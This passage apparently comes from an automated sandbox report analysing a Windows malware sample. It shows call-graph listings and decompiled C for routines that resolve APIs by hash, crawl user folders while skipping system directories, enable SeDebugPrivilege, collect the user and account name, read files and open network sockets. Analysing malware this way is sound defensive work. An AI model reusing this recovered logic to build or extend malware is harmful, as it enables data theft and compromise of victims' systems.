API calls 15390->15391 15392 40c728 15391->15392 15405 402c1f 15406 4031e5 4 API calls 15405->15406 15407 402c31 LoadLibraryW 15406->15407 15475 40f12f 15476 41219c 15 API calls 15475->15476 15477 40f13f 15476->15477 15478 
41219c 15 API calls 15477->15478 15479 40f14c 15478->15479 15480 41219c 15 API calls 15479->15480 15481 40f159 15480->15481 15482 41219c 15 API calls 15481->15482 15483 40f166 15482->15483 15490 40ed35 15491 4056bf 2 API calls 15490->15491 15492 40ed42 15491->15492 15493 412093 13 API calls 15492->15493 15494 40ed63 15493->15494 15495 412093 13 API calls 15494->15495 15496 40ed73 15495->15496 15497 413aca 4 API calls 15496->15497 15498 40ed80 15497->15498 15499 405695 2 API calls 15498->15499 15500 40ed8e 15499->15500 14029 40f3c5 14034 41219c 14029->14034 14032 41219c 15 API calls 14033 40f3e1 14032->14033 14035 4121b1 14034->14035 14051 40f3d3 14034->14051 14036 4121be 14035->14036 14040 4121c5 14035->14040 14083 413ba4 14036->14083 14038 4121ca 14052 404056 14038->14052 14040->14038 14044 412210 14040->14044 14041 4121c3 14041->14051 14060 405b6f 14041->14060 14044->14051 14088 403fbf 14044->14088 14045 41224d 14048 402bab 2 API calls 14045->14048 14045->14051 14048->14051 14051->14032 14099 402b7c GetProcessHeap RtlAllocateHeap 14052->14099 14054 404066 14055 404095 14054->14055 14101 4031e5 14054->14101 14055->14041 14058 404099 14059 402bab 2 API calls 14058->14059 14059->14055 14061 405b7d 14060->14061 14062 402b7c 2 API calls 14061->14062 14063 405b99 14062->14063 14069 405c02 14063->14069 14137 4059b8 14063->14137 14065 405c09 14068 402bab 2 API calls 14065->14068 14066 405bba 14066->14065 14067 402b7c 2 API calls 14066->14067 14070 405bdd 14067->14070 14068->14069 14069->14045 14073 413a58 14069->14073 14070->14065 14071 405be4 14070->14071 14072 402bab 2 API calls 14071->14072 14072->14069 14074 413a63 14073->14074 14082 412245 14073->14082 14074->14082 14140 405781 14074->14140 14077 405781 4 API calls 14078 413aa0 14077->14078 14143 4057df 14078->14143 14081 405781 4 API calls 14081->14082 14096 402bab 14082->14096 14086 413bad 14083->14086 14084 404056 7 API calls 14085 413bc5 14084->14085 14085->14041 14086->14084 14087 413bb8 14086->14087 
14087->14041 14089 402b7c 2 API calls 14088->14089 14091 403fcf 14089->14091 14090 403ff4 14090->14041 14091->14090 14262 403b98 14091->14262 14094 403ff8 GetLastError 14095 402bab 2 API calls 14094->14095 14095->14090 14097 402bb4 GetProcessHeap HeapFree 14096->14097 14098 402bc6 14096->14098 14097->14098 14098->14045 14100 402b98 14099->14100 14100->14054 14102 4031f3 14101->14102 14103 403236 14101->14103 14102->14103 14106 403208 14102->14106 14112 4030a5 14103->14112 14105 403224 14107 403258 SHGetFolderPathW 14105->14107 14109 4031e5 4 API calls 14105->14109 14118 403263 14106->14118 14107->14055 14107->14058 14109->14107 14110 40320d 14110->14107 14111 4030a5 4 API calls 14110->14111 14111->14105 14124 402ca4 14112->14124 14114 4030b0 14115 4030b5 14114->14115 14128 4030c4 14114->14128 14115->14105 14119 40326d 14118->14119 14120 402b7c 2 API calls 14119->14120 14123 4032b7 14119->14123 14121 40328c 14120->14121 14122 402b7c 2 API calls 14121->14122 14122->14123 14123->14110 14125 403079 14124->14125 14126 40307c 14125->14126 14132 40317b GetPEB 14125->14132 14126->14114 14129 4030eb 14128->14129 14130 4030c0 14129->14130 14134 402c03 14129->14134 14130->14105 14133 40319b 14132->14133 14133->14126 14135 4031e5 3 API calls 14134->14135 14136 402c15 GetProcAddress 14135->14136 14136->14130 14138 4031e5 4 API calls 14137->14138 14139 4059cb 14138->14139 14139->14066 14158 405797 14140->14158 14142 405792 14142->14077 14144 4057eb 14143->14144 14157 405832 14143->14157 14144->14157 14168 4040bb 14144->14168 14147 40582c 14192 403f9e 14147->14192 14148 405853 14206 405762 14148->14206 14149 405839 14149->14148 14195 405627 14149->14195 14156 403f9e 5 API calls 14156->14157 14157->14081 14157->14082 14159 4057a1 14158->14159 14161 4057bd 14158->14161 14159->14161 14162 4056fc 14159->14162 14161->14142 14163 405714 14162->14163 14164 402b7c 2 API calls 14163->14164 14166 405730 14164->14166 14165 405752 14165->14161 14166->14165 14167 402bab 2 API calls 
14166->14167 14167->14165 14169 4031e5 4 API calls 14168->14169 14170 4040d5 CreateFileW 14169->14170 14171 4040f8 14170->14171 14172 40418d 14170->14172 14173 4031e5 4 API calls 14171->14173 14184 404183 14172->14184 14212 403c90 14172->14212 14179 404105 14173->14179 14177 40416d 14209 403c40 14177->14209 14179->14177 14185 4031e5 4 API calls 14179->14185 14180 4041c8 14183 402bab 2 API calls 14180->14183 14182 4040bb 10 API calls 14182->14180 14183->14184 14184->14147 14184->14149 14184->14157 14186 404131 VirtualAlloc 14185->14186 14186->14177 14187 404142 14186->14187 14188 4031e5 4 API calls 14187->14188 14189 40414f ReadFile 14188->14189 14189->14177 14190 404160 14189->14190 14191 4031e5 4 API calls 14190->14191 14191->14177 14193 4031e5 4 API calls 14192->14193 14194 403fb1 VirtualFree 14193->14194 14194->14157 14196 4031e5 4 API calls 14195->14196 14197 40563a 14196->14197 14198 405872 14197->14198 14200 405881 14198->14200 14199 4058bc 14201 405797 4 API calls 14199->14201 14204 4058af 14199->14204 14200->14199 14259 4058d4 14200->14259 14201->14204 14204->14148 14205 405781 4 API calls 14205->14199 14207 405781 4 API calls 14206->14207 14208 405770 14207->14208 14208->14156 14210 4031e5 4 API calls 14209->14210 14211 403c52 CloseHandle 14210->14211 14211->14184 14213 403ca3 14212->14213 14214 403caa 14212->14214 14239 405dc5 14213->14239 14216 404056 7 API calls 14214->14216 14219 403d3a 14214->14219 14217 403cbe 14216->14217 14218 403d2e 14217->14218 14220 403d17 14217->14220 14221 403ccf 14217->14221 14218->14219 14224 402bab 2 API calls 14218->14224 14219->14184 14235 403c59 14219->14235 14222 405b6f 6 API calls 14220->14222 14223 405b6f 6 API calls 14221->14223 14225 403d14 14222->14225 14226 403cdd 14223->14226 14224->14219 14228 402bab 2 API calls 14225->14228 14227 405b6f 6 API calls 14226->14227 14229 403cee 14227->14229 14228->14218 14229->14225 14244 403d4d 14229->14244 14232 403d0b 14234 402bab 2 API calls 14232->14234 14234->14225 14236 
403c21 14235->14236 14237 4031e5 4 API calls 14236->14237 14238 403c33 14237->14238 14238->14180 14238->14182 14253 406799 14239->14253 14241 405dd5 14242 402b7c 2 API calls 14241->14242 14243 405dfe 14242->14243 14243->14214 14256 403bb7 14244->14256 14246 403cfe 14246->14232 14247 403c62 14246->14247 14248 403d4d 5 API calls 14247->14248 14249 403c6d 14248->14249 14250 403c72 14249->14250 14251 4031e5 4 API calls 14249->14251 14250->14232 14252 403c87 CreateDirectoryW 14251->14252 14252->14232 14254 4031e5 4 API calls 14253->14254 14255 4067ad 14254->14255 14255->14241 14257 4031e5 4 API calls 14256->14257 14258 403bc9 GetFileAttributesW 14257->14258 14258->14246 14260 405797 4 API calls 14259->14260 14261 4058a8 14260->14261 14261->14204 14261->14205 14263 4031e5 4 API calls 14262->14263 14264 403baa 14263->14264 14264->14090 14264->14094 17654 40ebc6 17655 4040bb 13 API calls 17654->17655 17656 40ebdf 17655->17656 17662 40ecd7 17656->17662 17674 407795 17656->17674 17659 40eccd 17661 403f9e 5 API calls 17659->17661 17660 4056bf 2 API calls 17673 40ec12 17660->17673 17661->17662 17663 40ecb5 17664 402bab 2 API calls 17663->17664 17665 40ecbd 17664->17665 17666 413aca 4 API calls 17665->17666 17667 40ecc7 17666->17667 17669 405695 2 API calls 17667->17669 17668 407908 GetProcessHeap RtlAllocateHeap 17668->17673 17669->17659 17670 412269 6 API calls 17670->17673 17671 402bab GetProcessHeap HeapFree 17671->17673 17672 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 17672->17673 17673->17663 17673->17668 17673->17670 17673->17671 17673->17672 17676 4077ab 17674->17676 17675 4077b3 17675->17659 17675->17660 17676->17675 17685 405ae9 17676->17685 17678 4077e1 17678->17675 17679 407802 17678->17679 17680 4077f8 17678->17680 17682 402b7c 2 API calls 17679->17682 17681 402bab 2 API calls 17680->17681 17681->17675 17683 407811 17682->17683 17684 402bab 2 API calls 17683->17684 17684->17675 17686 405af7 17685->17686 17687 402b7c 2 API calls 17686->17687 17689 

                          C-Code - Quality: 85%
                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				struct _WIN32_FIND_DATAW _v596;
                          				void* __ebx;
                          				void* _t35;
                          				int _t43;
                          				void* _t52;
                          				int _t56;
                          				intOrPtr _t60;
                          				void* _t66;
                          				void* _t73;
                          				void* _t74;
                          				WCHAR* _t98;
                          				void* _t99;
                          				void* _t100;
                          				void* _t101;
                          				WCHAR* _t102;
                          				void* _t103;
                          				void* _t104;
                          
                          				L004067C4(0xa); // executed
                          				_t72 = 0;
                          				_t100 = 0x2e;
                          				_t106 = _a16;
                          				if(_a16 == 0) {
                          					L15:
                          					_push(_a8);
                          					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                          					_t104 = _t103 + 0xc;
                          					if(_t98 == 0) {
                          						L30:
                          						__eflags = 0;
                          						return 0;
                          					}
                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                          					_t73 = _t35;
                          					if(_t73 == 0xffffffff) {
                          						L29:
                          						E00402BAB(_t98);
                          						goto L30;
                          					}
                          					L17:
                          					while(1) {
                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                          							if(_v596.dwFileAttributes != 0x10) {
                          								L21:
                          								_push( &(_v596.cFileName));
                          								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                          								_t104 = _t104 + 0xc;
                          								if(_t101 == 0) {
                          									goto L24;
                          								}
                          								if(_a12 == 0) {
                          									E00402BAB(_t98);
                          									E00403BEF(_t73);
                          									return _t101;
                          								}
                          								_a12(_t101);
                          								E00402BAB(_t101);
                          								goto L24;
                          							}
                          							_t124 = _a20;
                          							if(_a20 == 0) {
                          								goto L24;
                          							}
                          							goto L21;
                          						} else {
                          							L24:
                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                          							if(_t43 == 0) {
                          								E00403BEF(_t73); // executed
                          								goto L29;
                          							}
                          							_t100 = 0x2e;
                          							continue;
                          						}
                          					}
                          				}
                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                          				if(_t102 == 0) {
                          					L14:
                          					_t100 = 0x2e;
                          					goto L15;
                          				}
                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                          				_t74 = _t52;
                          				if(_t74 == 0xffffffff) {
                          					L13:
                          					E00402BAB(_t102);
                          					_t72 = 0;
                          					goto L14;
                          				} else {
                          					goto L3;
                          				}
                          				do {
                          					L3:
                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                          						goto L11;
                          					}
                          					if(_a24 == 0) {
                          						L7:
                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                          							L9:
                          							_push( &(_v596.cFileName));
                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                          							_t103 = _t103 + 0xc;
                          							_a16 = _t60;
                          							_t115 = _t60;
                          							if(_t60 == 0) {
                          								goto L11;
                          							}
                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                          							E00402BAB(_a16);
                          							_t103 = _t103 + 0x1c;
                          							if(_t99 != 0) {
                          								E00402BAB(_t102);
                          								E00403BEF(_t74);
                          								return _t99;
                          							}
                          							goto L11;
                          						}
                          						_t66 = 0x2e;
                          						_t114 = _v596.cFileName - _t66;
                          						if(_v596.cFileName == _t66) {
                          							goto L11;
                          						}
                          						goto L9;
                          					}
                          					_push(L"Windows");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					_push(L"Program Files");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					goto L7;
                          					L11:
                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                          				} while (_t56 != 0);
                          				E00403BEF(_t74); // executed
                          				goto L13;
                          			}

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows

                          C-Code - Quality: 78%
                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                          				void* _v8;
                          				struct _LUID _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				struct _TOKEN_PRIVILEGES _v32;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				int _t16;
                          				int _t31;
                          				void* _t32;
                          
                          				_t31 = 0;
                          				E004060AC();
                          				_t32 = __eax;
                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                          				if(_t14 != 0) {
                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                          					if(_t16 != 0) {
                          						_push(__ebx);
                          						_v32.Privileges = _v16.LowPart;
                          						_v32.PrivilegeCount = 1;
                          						_v24 = _v16.HighPart;
                          						_v20 = 2;
                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                          						_t31 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_v8);
                          					return _t31;
                          				}
                          				return _t14;
                          			}

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege

                          C-Code - Quality: 100%
                          			E00406069(WCHAR* _a4, DWORD* _a8) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                          				_t4 = GetUserNameW(_a4, _a8); // executed
                          				return _t4;
                          			}

                          APIs
                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Similarity
                          • API ID: NameUser

                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Similarity
                          • API ID: recv

                          C-Code - Quality: 81%
                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                          				WCHAR* _v8;
                          				long _v12;
                          				void** _v16;
                          				WCHAR* _v20;
                          				long _v24;
                          				long _v28;
                          				union _SID_NAME_USE _v32;
                          				intOrPtr* _t25;
                          				WCHAR* _t27;
                          				WCHAR* _t30;
                          				WCHAR* _t31;
                          				WCHAR* _t36;
                          				WCHAR* _t37;
                          				WCHAR* _t40;
                          				long _t44;
                          				intOrPtr* _t45;
                          				WCHAR* _t46;
                          				void* _t48;
                          				WCHAR* _t49;
                          				WCHAR* _t67;
                          				void* _t68;
                          				void* _t74;
                          
                          				_t48 = __ebx;
                          				_t67 = 0;
                          				_v8 = 0;
                          				E00402BF2();
                          				_t68 = __eax;
                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                          				_t2 =  &_v8; // 0x414449
                          				_push(1);
                          				_push(8);
                          				_push(_t68);
                          				if( *_t25() != 0) {
                          					L4:
                          					_t27 = E00402B7C(0x208);
                          					_v20 = _t27;
                          					__eflags = _t27;
                          					if(_t27 != 0) {
                          						E0040338C(_t27, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_push(_t48);
                          					_t49 = E00402B7C(0x208);
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E0040338C(_t49, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_v28 = 0x208;
                          					_v24 = 0x208;
                          					_t7 =  &_v8; // 0x414449
                          					_v12 = _t67;
                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                          					__eflags = _t30;
                          					if(_t30 == 0) {
                          						_t36 = E00402B7C(_v12);
                          						_v16 = _t36;
                          						__eflags = _t36;
                          						if(_t36 != 0) {
                          							_t14 =  &_v8; // 0x414449, executed
                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                          								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                          								__eflags = _t40;
                          								if(__eflags != 0) {
                          									_t67 = E00405B6F(__eflags, L"%s", _t49);
                          								}
                          							}
                          							E00402BAB(_v16);
                          						}
                          					}
                          					__eflags = _v8;
                          					if(_v8 != 0) {
                          						E00403C40(_v8); // executed
                          					}
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E00402BAB(_t49);
                          					}
                          					_t31 = _v20;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						E00402BAB(_t31);
                          					}
                          					return _t67;
                          				}
                          				_t44 = GetLastError();
                          				if(_t44 == 0x3f0) {
                          					E004060AC();
                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          					_t3 =  &_v8; // 0x414449
                          					_t46 =  *_t45(_t44, 8, _t3);
                          					__eflags = _t46;
                          					if(_t46 == 0) {
                          						goto L2;
                          					}
                          					goto L4;
                          				}
                          				L2:
                          				return 0;
                          			}

                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wmemset$AccountErrorInformationLastLookupToken
                          • String ID: IDA$IDA
                          • API String ID: 3235442692-2020647798
                          • Opcode ID: 2112e895418518b3aaf2b5de2dd6d1e0f0097c6d5c5f57a4f240550e55cdae00
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: 2112e895418518b3aaf2b5de2dd6d1e0f0097c6d5c5f57a4f240550e55cdae00
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 721 404e17-404e57 getaddrinfo 722 404e59-404e5b 721->722 723 404e5d-404e84 call 402b7c socket 721->723 724 404ecf-404ed3 722->724 727 404e86-404e96 call 402bab freeaddrinfo 723->727 728 404e98-404ea7 connect 723->728 739 404ec7-404ec9 727->739 730 404eb3-404ebe freeaddrinfo 728->730 731 404ea9-404eb1 call 404de5 728->731 733 404ec0-404ec6 call 402bab 730->733 734 404ecb 730->734 731->730 733->739 738 404ecd-404ece 734->738 738->724 739->738
                          C-Code - Quality: 37%
                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void _v40;
                          				void* _t23;
                          				signed int _t24;
                          				signed int* _t25;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t33;
                          				signed int _t41;
                          				void* _t42;
                          				signed int* _t43;
                          
                          				_v8 = _v8 & 0x00000000;
                          				_t33 = 8;
                          				memset( &_v40, 0, _t33 << 2);
                          				_v32 = 1;
                          				_t23 =  &_v40;
                          				_v28 = 6;
                          				_v36 = 2;
                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                          				if(_t23 == 0) {
                          					_t24 = E00402B7C(4);
                          					_t43 = _t24;
                          					_t31 = _t30 | 0xffffffff;
                          					 *_t43 = _t31;
                          					_t41 = _v8;
                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                          					 *_t43 = _t24;
                          					if(_t24 != _t31) {
                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                          						if(_t24 == _t31) {
                          							E00404DE5(_t24,  *_t43);
                          							 *_t43 = _t31;
                          						}
                          						__imp__freeaddrinfo(_v8);
                          						if( *_t43 != _t31) {
                          							_t25 = _t43;
                          							goto L10;
                          						} else {
                          							E00402BAB(_t43);
                          							L8:
                          							_t25 = 0;
                          							L10:
                          							return _t25;
                          						}
                          					}
                          					E00402BAB(_t43);
                          					__imp__freeaddrinfo(_v8);
                          					goto L8;
                          				}
                          				return 0;
                          			}

                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 24ce84c10c969aea94c1025059d7642f8b55e38ae369deafe647ee036e6b461b
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 24ce84c10c969aea94c1025059d7642f8b55e38ae369deafe647ee036e6b461b
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 741 4040bb-4040f2 call 4031e5 CreateFileW 744 4040f8-404111 call 4031e5 741->744 745 40418d-404190 741->745 756 404113-404119 744->756 757 40417a 744->757 747 404192-4041a7 call 403c90 745->747 748 404184 745->748 747->748 753 4041a9-4041b8 call 403c59 747->753 751 404186-40418c 748->751 761 4041ba-4041d8 call 4040bb call 403d44 753->761 762 4041db-4041e4 call 402bab 753->762 756->757 760 40411b-404120 756->760 759 40417d-40417e call 403c40 757->759 768 404183 759->768 764 404122 760->764 765 404124-404140 call 4031e5 VirtualAlloc 760->765 761->762 762->751 764->765 765->757 773 404142-40415e call 4031e5 ReadFile 765->773 768->748 773->759 778 404160-404178 call 4031e5 773->778 778->759
                          C-Code - Quality: 74%
                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                          				struct _SECURITY_ATTRIBUTES* _v8;
                          				char _v12;
                          				long _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t16;
                          				intOrPtr* _t25;
                          				long* _t28;
                          				void* _t30;
                          				int _t32;
                          				intOrPtr* _t33;
                          				void* _t35;
                          				void* _t42;
                          				intOrPtr _t43;
                          				long _t44;
                          				struct _OVERLAPPED* _t46;
                          
                          				_t46 = 0;
                          				_t35 = 0;
                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                          				_t42 = _t16;
                          				_v8 = _t42;
                          				if(_t42 == 0xffffffff) {
                          					__eflags = _a12;
                          					if(_a12 == 0) {
                          						L10:
                          						return _t35;
                          					}
                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                          					__eflags = _t43;
                          					if(_t43 == 0) {
                          						goto L10;
                          					}
                          					_push(0);
                          					__eflags = E00403C59(_a4, _t43);
                          					if(__eflags != 0) {
                          						_v8 = 0;
                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                          						_push(_t43);
                          						 *_a8 = _v8;
                          						E00403D44();
                          					}
                          					E00402BAB(_t43);
                          					return _t46;
                          				}
                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                          				_t44 =  *_t25(_t42,  &_v12);
                          				if(_v12 != 0 || _t44 > 0x40000000) {
                          					L8:
                          					_t45 = _v8;
                          					goto L9;
                          				} else {
                          					_t28 = _a8;
                          					if(_t28 != 0) {
                          						 *_t28 = _t44;
                          					}
                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                          					_t35 = _t30;
                          					if(_t35 == 0) {
                          						goto L8;
                          					} else {
                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                          						_t45 = _v8;
                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                          						if(_t32 == 0) {
                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                          							 *_t33(_t35, _t46, 0x8000);
                          							_t35 = _t46;
                          						}
                          						L9:
                          						E00403C40(_t45); // executed
                          						goto L10;
                          					}
                          				}
                          			}

                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00413866(void* __eflags) {
                          				short _v6;
                          				short _v8;
                          				short _v10;
                          				short _v12;
                          				short _v14;
                          				short _v16;
                          				short _v18;
                          				short _v20;
                          				short _v22;
                          				char _v24;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				short _v40;
                          				short _v42;
                          				short _v44;
                          				short _v46;
                          				char _v48;
                          				short _v52;
                          				short _v54;
                          				short _v56;
                          				short _v58;
                          				short _v60;
                          				short _v62;
                          				short _v64;
                          				short _v66;
                          				short _v68;
                          				short _v70;
                          				short _v72;
                          				short _v74;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t38;
                          				short _t43;
                          				short _t44;
                          				short _t45;
                          				short _t46;
                          				short _t47;
                          				short _t48;
                          				short _t50;
                          				short _t51;
                          				short _t52;
                          				short _t54;
                          				short _t55;
                          				intOrPtr* _t57;
                          				intOrPtr* _t59;
                          				intOrPtr* _t61;
                          				void* _t63;
                          				WCHAR* _t65;
                          				long _t68;
                          				void* _t75;
                          				short _t76;
                          				short _t78;
                          				short _t83;
                          				short _t84;
                          				short _t85;
                          
                          				E00402C6C(_t38);
                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                          				SetErrorMode(3); // executed
                          				_t43 = 0x4f;
                          				_v76 = _t43;
                          				_t44 = 0x4c;
                          				_v74 = _t44;
                          				_t45 = 0x45;
                          				_v72 = _t45;
                          				_t46 = 0x41;
                          				_v70 = _t46;
                          				_t47 = 0x55;
                          				_v68 = _t47;
                          				_t48 = 0x54;
                          				_t76 = 0x33;
                          				_t84 = 0x32;
                          				_t83 = 0x2e;
                          				_t78 = 0x64;
